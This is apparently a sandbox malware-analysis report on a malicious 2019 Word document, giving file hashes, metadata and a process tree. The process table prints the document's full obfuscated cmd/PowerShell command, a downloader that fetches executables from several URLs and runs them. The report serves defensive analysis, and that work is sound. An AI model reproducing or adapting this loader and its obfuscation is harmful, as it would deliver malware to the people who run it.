File name: | FA014247_3.doc |
Full analysis: | https://app.any.run/tasks/84df9c63-1416-4b18-a323-3d00f10eb3a7 |
Verdict: | Malicious activity |
Analysis date: | January 17, 2019, 20:03:29 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Mon Jan 14 17:54:00 2019, Last Saved Time/Date: Mon Jan 14 17:54:00 2019, Number of Pages: 1, Number of Words: 2, Number of Characters: 14, Security: 0 |
MD5: | 7EDF188537E4512D36575D60F64A056E |
SHA1: | 58E9F7680F399C7E8906F98FC7CD58CA1558EA58 |
SHA256: | 80B58A1C3693373040D28944CA207B2AE7B63DF10A9C1B8B12FD2E9BE0FC9A47 |
SSDEEP: | 1536:iocn1kp59gxBK85fBr4ecYTDj4kciEVrA/60t4211j+a9uK:f41k/W4825ODkLVrA/7t481gK |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
Title: | - |
---|---|
Subject: | - |
Author: | - |
Keywords: | - |
Comments: | - |
Template: | Normal.dotm |
LastModifiedBy: | - |
RevisionNumber: | 1 |
Software: | Microsoft Office Word |
TotalEditTime: | - |
CreateDate: | 2019:01:14 17:54:00 |
ModifyDate: | 2019:01:14 17:54:00 |
Pages: | 1 |
Words: | 2 |
Characters: | 14 |
Security: | None |
CodePage: | Windows Latin 1 (Western European) |
Company: | - |
Lines: | 1 |
Paragraphs: | 1 |
CharCountWithSpaces: | 15 |
AppVersion: | 16 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: | - |
HeadingPairs: |
|
CompObjUserTypeLen: | 32 |
CompObjUserType: | Microsoft Word 97-2003 Document |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2988 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\FA014247_3.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
2320 | "C:\Windows\system32\cmd.exe" /c %prOgRAMdata:~0,1%%pROGRAmDaTA:~9,2% /V: /r " SEt YuP=pow^%PUBLIC:~5,1^%r^%SESSIONNAME:~-4,1^%h^%TEMP:~-2,1^%ll +virtu]lV=w3fneur]lAw3f;+Jeweler_R=new-obje.t Net$#ebClient;+`eliver]bles[=w3fhttp://r]_-bet]$.om/1bV[EjoTlj@http://m]`hur]]rts$.om/##m29mGm@http://www$7i7]journ]l$.om/D1o40Dmemk@http://li3numpolsk]$.om/lCGBPPq{MY@http://w]liw]lo$.om/urHKt1`sw3f$Split(w3f@w3f);+Br][ili]nRe]ll=w3fTriplebu77ere`Ew3f;+7ullr]n3e# = w3f9w3f;+Che.kin3A..ountB=w3fPro7it7o.use`bw3f;+ivor_m=+env:publi.6w3f\w3f6+7ullr]n3e#6w3f$exew3f;7ore].h(+plum7 in +`eliver]bles[)Ztr_Z+Jeweler_R$Downlo]`File(+plum7, +ivor_m);+solutionoriente`A=w3fAwesomePl]sti.Chipstw3f;I7 ((Get-Item +ivor_m)$len3th -3e 80000) ZInvoke-Item +ivor_m;+Bu.kin3h]mshirep=w3fGr]nite?w3f;bre]k;}}.]t.hZ}}+M]ss].husettsJ=w3fSriL]nk]Rupeekw3f;&& SET fGx=!YuP:BP=Q!&& sEt az5=!fGx:w3f='!& seT ab=!az5:{=X!& sEt jL=!ab:.=c!& sEt Mr=!jL:$=.!&SET F7e=!Mr:Z={!& seT EW9T=!F7e:_=y!& Set oP=!EW9T:+=$!&& SET 7R2=!oP:3=g!&& sEt ZM5=!7R2:[=z!&& SEt CM6R=!ZM5:]=a!&& seT zOn=!CM6R:2=3!& SeT ye=!zOn:#=W!& Set EIML=!ye:?=Z!& SeT 7WhP=!EIML:`=d!&sEt upaZ=!7WhP:6=+!&seT W1A=!upaZ:7=f!& eCHO %W1A% | c%coMMOnpRoGRaMfIlES(X86):~25,1%%wInDIr:~6,1% " | C:\Windows\system32\cmd.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 255 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2892 | CmD /V: /r " SEt YuP=pow^%PUBLIC:~5,1^%r^%SESSIONNAME:~-4,1^%h^%TEMP:~-2,1^%ll +virtu]lV=w3fneur]lAw3f;+Jeweler_R=new-obje.t Net$#ebClient;+`eliver]bles[=w3fhttp://r]_-bet]$.om/1bV[EjoTlj@http://m]`hur]]rts$.om/##m29mGm@http://www$7i7]journ]l$.om/D1o40Dmemk@http://li3numpolsk]$.om/lCGBPPq{MY@http://w]liw]lo$.om/urHKt1`sw3f$Split(w3f@w3f);+Br][ili]nRe]ll=w3fTriplebu77ere`Ew3f;+7ullr]n3e# = w3f9w3f;+Che.kin3A..ountB=w3fPro7it7o.use`bw3f;+ivor_m=+env:publi.6w3f\w3f6+7ullr]n3e#6w3f$exew3f;7ore].h(+plum7 in +`eliver]bles[)Ztr_Z+Jeweler_R$Downlo]`File(+plum7, +ivor_m);+solutionoriente`A=w3fAwesomePl]sti.Chipstw3f;I7 ((Get-Item +ivor_m)$len3th -3e 80000) ZInvoke-Item +ivor_m;+Bu.kin3h]mshirep=w3fGr]nite?w3f;bre]k;}}.]t.hZ}}+M]ss].husettsJ=w3fSriL]nk]Rupeekw3f;&& SET fGx=!YuP:BP=Q!&& sEt az5=!fGx:w3f='!& seT ab=!az5:{=X!& sEt jL=!ab:.=c!& sEt Mr=!jL:$=.!&SET F7e=!Mr:Z={!& seT EW9T=!F7e:_=y!& Set oP=!EW9T:+=$!&& SET 7R2=!oP:3=g!&& sEt ZM5=!7R2:[=z!&& SEt CM6R=!ZM5:]=a!&& seT zOn=!CM6R:2=3!& SeT ye=!zOn:#=W!& Set EIML=!ye:?=Z!& SeT 7WhP=!EIML:`=d!&sEt upaZ=!7WhP:6=+!&seT W1A=!upaZ:7=f!& eCHO %W1A% | c%coMMOnpRoGRaMfIlES(X86):~25,1%d " | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 255 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3136 | C:\Windows\system32\cmd.exe /S /D /c" eCHO %W1A% " | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 1 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) |
PID | Process | Filename | Type | |
---|---|---|---|---|
2988 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR93E9.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2988 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\98CF382A.wmf | — | |
MD5:— | SHA256:— | |||
2988 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\684491C8.wmf | — | |
MD5:— | SHA256:— | |||
2988 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CF009623.wmf | wmf | |
MD5:9172DC043D41D345187DBB97CE60D6B2 | SHA256:D60F4431B98D15D23740A49AF38C5B9D1A77D54E2D9B8C271A3AFA984584D759 | |||
2988 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A4A44F8D.wmf | wmf | |
MD5:CC589168B4A6F0F151D8A1FE8D9BAEC2 | SHA256:FD33280AC13E859110C4B6DC4887B47BAA418C06AC524C5BE791DF255473386C | |||
2988 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:350A6AB3E642AD77B9E327B84E93FF24 | SHA256:961AA9C799AC2BC892E5FA8DE785D60F887D08804BFFBED4C29E34366375306C | |||
2988 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exd | tlb | |
MD5:3A36A63B3B9A2C97D8B5C15E872342FB | SHA256:A80457C3F715D6C8BA62EDEFAE0AC3C8E2E2AD698CE064E40756D824DDBE8E12 | |||
2988 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$014247_3.doc | pgc | |
MD5:5AA55B175ECACFEE3C75D80DE4DF9677 | SHA256:40BBD25FFE56138F625DFB4DB3405AF63FEFC0C9D830DB0A20EDD0205D7BCCD5 |